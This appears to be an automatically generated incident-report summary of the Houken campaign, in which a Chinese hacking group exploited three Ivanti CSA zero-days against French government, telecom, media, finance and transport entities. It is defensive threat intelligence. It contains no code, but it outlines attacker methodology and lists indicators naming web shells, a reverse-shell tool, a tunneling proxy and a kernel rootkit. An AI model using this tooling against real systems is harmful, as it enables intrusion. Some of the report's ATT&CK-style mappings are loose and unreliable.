Full Report
The French cybersecurity agency on Tuesday revealed that a number of entities spanning governmental, telecommunications, media, finance, and transport sectors in the country were impacted by a malicious campaign undertaken by a Chinese hacking group by weaponizing several zero-day vulnerabilities in Ivanti Cloud Services Appliance (CSA) devices. The campaign, detected at the beginning of
Analysis Summary
# Incident Report: Zero-Day Exploitation of Ivanti CSA by Chinese Hacking Group (Houken)
## Executive Summary
A sophisticated Chinese hacking group, codenamed **Houken** (likely linked to UNC5174), conducted a malicious campaign exploiting three zero-day vulnerabilities in Ivanti Cloud Services Appliance (CSA) devices. The campaign impacted multiple sectors in France, including government, telecom, media, finance, and transport, leading to credential theft, rootkit installation, and potential data exfiltration, with some instances indicating deployment of cryptocurrency miners.
## Incident Details
- **Discovery Date:** Beginning of September 2024 (Campaign detection)
- **Incident Date:** Throughout 2024, with ANSSI reporting in July 2025.
- **Affected Organization:** Number of entities spanning governmental, telecommunications, media, finance, and transport sectors in France.
- **Sector:** Governmental, Telecommunications, Media, Finance, Transport.
- **Geography:** France (Primary focus of ANSSI report), potentially wider targeting in Southeast Asia (Gov/Education) and the West.
## Timeline of Events
### Initial Access
- **Date/Time:** Began at the beginning of September 2024 (Campaign start).
- **Vector:** Exploitation of three zero-day vulnerabilities in Ivanti Cloud Services Appliance (CSA) devices: CVE-2024-8963, CVE-2024-9380, and CVE-2024-8190.
- **Details:** Attackers used the zero-days to gain a foothold and obtain credentials on targeted devices.
### Lateral Movement
- **Vector/Techniques:** Deployment of GOREVERSE (a variant of GoReShell) post-exploitation, followed by the use of the HTTP proxy tunneling tool `suo5` for command and control/movement.
### Data Exfiltration/Impact
- **Impact:** Initial access brokering, establishment of persistence via sophisticated means, and in at least one observed case, deployment of cryptocurrency miners, suggesting financial motivation alongside intelligence gathering.
- **Persistence Mechanism:** Attackers deployed persistence using three methods: 1) Deploying PHP web shells (like Behinder and neo-ReGeorg); 2) Modifying existing PHP scripts; 3) Installing a rootkit (`sysinitd.ko` kernel module) to achieve remote command execution with root privileges.
### Detection & Response
- **Detection:** Detected beginning of September 2024 by French cybersecurity agencies (ANSSI). The activity was later documented and revealed publicly by ANSSI.
- **Response actions taken:** Not explicitly detailed in terms of remediation steps taken by victims, but indicators suggest awareness and ongoing investigation by state agencies.
## Attack Methodology
- **Initial Access:** Exploitation of Ivanti CSA zero-days (CVE-2024-8963, CVE-2024-9380, CVE-2024-8190).
- **Persistence:** PHP web shells (Behinder, neo-ReGeorg), user-space executable (`sysinitd`), and a kernel module rootkit (`sysinitd.ko`).
- **Privilege Escalation:** Achieved root privileges via the `sysinitd.ko` rootkit hijacking inbound TCP traffic.
- **Defense Evasion:** Use of a sophisticated rootkit (`sysinitd.ko`) and potentially attempting to patch the exploited vulnerabilities on compromised systems to prevent other actors from gaining access.
- **Credential Access:** Gained via exploitation of the Ivanti CSA vulnerabilities.
- **Discovery:** Activity linked to operating in the UTC+8 time zone (CST), suggesting reconnaissance aligned with Chinese operational hours.
- **Lateral Movement:** Utilized GOREVERSE and the `suo5` proxy tunneling tool.
- **Collection:** Implied collection for the purpose of selling access or intelligence data.
- **Exfiltration:** Not explicitly detailed, but the primary goal appears to be selling initial access or high-value intelligence.
- **Impact:** Establishment of persistent, high-privilege access; potential deployment of cryptocurrency miners.
## Impact Assessment
- **Financial:** Implied costs related to incident response and potential revenue loss from cryptocurrency mining operations (in at least one case).
- **Data Breach:** Unauthorized credential access; potential intelligence data gathered, although specific data types are not detailed.
- **Operational:** Disruption potential due to compromise of critical infrastructure sectors (Telecom, Finance, Transport).
- **Reputational:** Significant concern given that French governmental and critical infrastructure entities were targeted.
## Indicators of Compromise
(Note: IOCs are listed as described, without defanging as they are vendor/internal tools utilized by the threat actor, not network artifacts.)
- **Network indicators:** Use of commercial VPNs and dedicated servers for infrastructure. Use of HTTP proxy tunneling tool `suo5`.
- **File indicators:** PHP web shells (Behinder, neo-ReGeorg), GOREVERSE (GoReShell variant), `sysinitd` executable, `sysinitd.ko` (Linux kernel module rootkit).
- **Behavioral indicators:** Operation during UTC+8 time zone; patching of exploited vulnerabilities post-compromise.
## Response Actions
- **Containment measures:** Not specified, but initial steps would involve isolating compromised Ivanti CSA appliances and patching/replacing devices exploiting the zero-days.
- **Eradication steps:** Removal of all web shells, malware (GOREVERSE), and the `sysinitd` rootkit from affected systems.
- **Recovery actions:** Hardening of perimeter devices, credential rotation, and potentially full system rebuilds for devices infected with the kernel module.
## Lessons Learned
- **Key takeaways:** State-linked actors (or actors selling to them) are actively leveraging zero-day vulnerabilities in widely used appliances (like Ivanti CSA) as an initial access broker strategy. The use of sophisticated tools like kernel rootkits provides deep, high-privilege stealth.
- **What could have been done better:** Need for faster patching cycles for widely deployed perimeter appliances, especially when supply-chain vulnerabilities are involved. Proactive threat hunting for novel rootkits on critical infrastructure.
## Recommendations
- Immediately audit and patch all Ivanti CSA devices against CVE-2024-8963, CVE-2024-9380, and CVE-2024-8190.
- Implement mandatory segmentation for perimeter appliances like Ivanti CSAs, restricting access to only necessary internal networks.
- Enhance endpoint detection and response (EDR) capabilities to detect unusual kernel module loading or suspicious modification of core system files (PHP scripts).
- Review infrastructure for signs of the `sysinitd.ko` rootkit and associated Go-based malware families if similar IoT/Appliance targeting is suspected.